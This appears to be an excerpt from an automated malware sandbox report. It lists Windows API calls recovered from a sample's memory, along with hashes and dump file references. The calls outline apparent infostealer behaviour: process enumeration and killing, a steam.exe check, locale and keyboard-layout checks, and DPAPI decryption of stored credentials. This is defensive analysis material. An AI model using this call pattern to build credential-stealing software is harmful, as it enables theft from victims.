                          • Opcode ID: 1ee079326dc2faa2ab20007e4b9afed338d00e0c0bf8069b853424811fbb7088
                          • Instruction ID: add21f85c2c52844ca364cc3aa61e64178f62406f4e0005668965f8ac322eebb
                          • Opcode Fuzzy Hash: 1ee079326dc2faa2ab20007e4b9afed338d00e0c0bf8069b853424811fbb7088
                          • Instruction Fuzzy Hash: 77417C316112199BCB33EF68EC85ADF73A4EF11304F055229F94A9BA22DF309C158B90
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C46B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C46C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C46DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 003C46ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C4702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 003C4711
                          • CloseHandle.KERNEL32(00000000), ref: 003C4718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C4726
                          • CloseHandle.KERNEL32(00000000), ref: 003C4731
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: ad65251a08e82ff9b1b07d469b2004898749538fee86245294fa4f169dfd0993
                          • Instruction ID: 49abcf7e0dba4276d827e0087ea246f40dc77a309821fd99ad8a841e2bf32395
                          • Opcode Fuzzy Hash: ad65251a08e82ff9b1b07d469b2004898749538fee86245294fa4f169dfd0993
                          • Instruction Fuzzy Hash: 6201D231602125ABE7315B60EC8DFFA377CEB59B11F04008BF909D1180EF749D88AB60
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 003C4628
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C4638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 003C4660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C4672
                          • CloseHandle.KERNEL32(00000000), ref: 003C467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: 4ebc97dea111e39e483fffeb42ac3225f256677d33a92c048fe75498d1e06938
                          • Instruction ID: 5afe2d1aa3f07e7f33248d1c621d63358387edbffd877a60fc4c03991a1420e8
                          • Opcode Fuzzy Hash: 4ebc97dea111e39e483fffeb42ac3225f256677d33a92c048fe75498d1e06938
                          • Instruction Fuzzy Hash: 1701A271602124ABD731AB60AC49FEA77BCEF19350F0401DBED08D1140EF748DA89BE1
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4B7F
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BA7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B4BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 89f030778ae75dc7d0f7a207ac500acdc42a2c50400ea907a791d97157b8bb00
                          • Instruction ID: 12a518da7cd9aea465c5e293b225b44bb17716e247d0fe7862f2d928c5e4dec0
                          • Opcode Fuzzy Hash: 89f030778ae75dc7d0f7a207ac500acdc42a2c50400ea907a791d97157b8bb00
                          • Instruction Fuzzy Hash: 583139316211169BCB37EF68EC85E9F77B9EF51704F050129FA459BA22EB30DC158B90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6!6w$BEM$D<Ko$P[_$do}$n*r~$y/qw$1.g
                          • API String ID: 0-41712224
                          • Opcode ID: e51188c7ed00668f994c5c80f2c3be46781c7ebbe295ee30286447a3e921ca70
                          • Instruction ID: 1a2e2cf70b8a5faac39e341114f2fd2d8d2d5a9697c127ed1f99d231cd6e6aba
                          • Opcode Fuzzy Hash: e51188c7ed00668f994c5c80f2c3be46781c7ebbe295ee30286447a3e921ca70
                          • Instruction Fuzzy Hash: CAB207F390C2149FE3046E29EC8567AFBE9EF94720F1A493DEAC4C7744EA3558058693
                          APIs
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003C2D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 003C2DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003C2DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003C2DEC
                          • LocalFree.KERNEL32(00000000), ref: 003C2FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: b872092c48437b90382c2ed120cc31a72faf4e7a5e7fbd464b8d60355b626e28
                          • Instruction ID: d2f9b92b27e8a3b77ea26600530b42710a5c0f8ae605addb725bccfe818dff2a
                          • Opcode Fuzzy Hash: b872092c48437b90382c2ed120cc31a72faf4e7a5e7fbd464b8d60355b626e28
                          • Instruction Fuzzy Hash: 54B10971901214CFD726CF54C948B9AB7F1BB44324F2AC1AED409EB2A2D7769D86CF80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1v$.>H $E+7n$Ub}|$Zrw($dQyo
                          • API String ID: 0-3060356591
                          • Opcode ID: 82237ad9dc01c14b775b0254cf54f96fae7d171161f818b061e024ea8cd5879c
                          • Instruction ID: a876099fe0eabbc524de1780924ed495ec73f5e06072a5ea8c18cfda41d83c16
                          • Opcode Fuzzy Hash: 82237ad9dc01c14b775b0254cf54f96fae7d171161f818b061e024ea8cd5879c
                          • Instruction Fuzzy Hash: F1B2F6F360C2049FE304AE29EC8567AB7E9EFD4720F1A893DEAC5C7344E63558058697
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003C2C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 003C2C58
                          • wsprintfA.USER32 ref: 003C2C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: 7bdc5b66753c7cfb8685385a66afcd22766d7e40d94404e2ef2617f7d2805407
                          • Instruction ID: 20fa4e7a4b1c2c7d80e135c005189a53d44b990129b01cd98b2b33b3545f546b
                          • Opcode Fuzzy Hash: 7bdc5b66753c7cfb8685385a66afcd22766d7e40d94404e2ef2617f7d2805407
                          • Instruction Fuzzy Hash: 3201A771A41604ABD7289F58DC49FAAB769EB84721F00436BF915D77C0D77419048BD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Vx6{$dL_~$z?~$0W$qQi
                          • API String ID: 0-3270706516
                          • Opcode ID: e8974473b526f7a8d4f1c934fd7c83aec87687001f92d74e5759ce25c25ab6e1
                          • Instruction ID: 0b6280f95dd4105ac376171832769bbc99ef775edd8e7074bcb583864f9f68a3
                          • Opcode Fuzzy Hash: e8974473b526f7a8d4f1c934fd7c83aec87687001f92d74e5759ce25c25ab6e1
                          • Instruction Fuzzy Hash: 6CB21AF360C2049FE304AE2DEC8567AFBE9EF94720F16853DEAC4C7744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'ow$`G0F$lk4+$o ?C$s{%
                          • API String ID: 0-2069601964
                          • Opcode ID: 477272c887537a09aa46a02069f6e549b64f48a2d6f32bb6dfd1b7d71fb07dab
                          • Instruction ID: 1ba8bc7175b03022a86decafcd1b2347c009da7003e53b917649b749885981ed
                          • Opcode Fuzzy Hash: 477272c887537a09aa46a02069f6e549b64f48a2d6f32bb6dfd1b7d71fb07dab
                          • Instruction Fuzzy Hash: CBB207F360C2109FE304AE2DEC8567AFBE9EB94360F16493DEAC4C7744E63598058792
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 003C1B72
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C184F
                            • Part of subcall function 003C1820: lstrlen.KERNEL32(00F16D10), ref: 003C1860
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C1887
                            • Part of subcall function 003C1820: lstrcat.KERNEL32(00000000,00000000), ref: 003C1892
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C18C1
                            • Part of subcall function 003C1820: lstrlen.KERNEL32(003D4FA0), ref: 003C18D3
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C18F4
                            • Part of subcall function 003C1820: lstrcat.KERNEL32(00000000,003D4FA0), ref: 003C1900
                            • Part of subcall function 003C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003C192F
                          • sscanf.NTDLL ref: 003C1B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003C1BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003C1BC6
                          • ExitProcess.KERNEL32 ref: 003C1BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: a728ad8a04dcd5075ed09655b4fe95076014b615d9820d310492d26967a37f02
                          • Instruction ID: c3c84bac139b6a9ad3326d5b60f4307df2b877fc43c58da3806370d54bdecf20
                          • Opcode Fuzzy Hash: a728ad8a04dcd5075ed09655b4fe95076014b615d9820d310492d26967a37f02
                          • Instruction Fuzzy Hash: 2221E4B1518301AF8354EF69D88495BBBF8EED9314F408A1EF599C3220E730D9089BA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003A775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A7765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003A778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003A77AD
                          • LocalFree.KERNEL32(?), ref: 003A77B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
